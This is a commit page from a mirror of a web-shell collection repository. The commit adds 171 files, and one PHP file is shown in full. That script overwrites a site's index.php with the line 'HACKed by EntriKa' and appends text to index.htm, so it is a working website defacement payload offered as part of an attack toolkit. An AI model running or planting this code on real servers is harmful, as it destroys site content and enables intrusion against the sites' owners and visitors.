1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-07 13:21:28 +00:00

reupdate xakepshell

This commit is contained in:
tennc
2014-05-18 09:06:34 +08:00
parent 82dda2540f
commit a4229cf9dc
171 changed files with 164183 additions and 0 deletions

View File

@@ -0,0 +1,13 @@
<?php
$entry_line="HACKed by EntriKa";
$fp = fopen("index.php", "w");
fputs($fp, $entry_line);
fclose($fp);
?>
<?
$fp =@fopen("index.htm", "a+");
$yazi = "test" . "\r\n";
fwrite ($fp, "$yazi");
fclose ($fp);
?>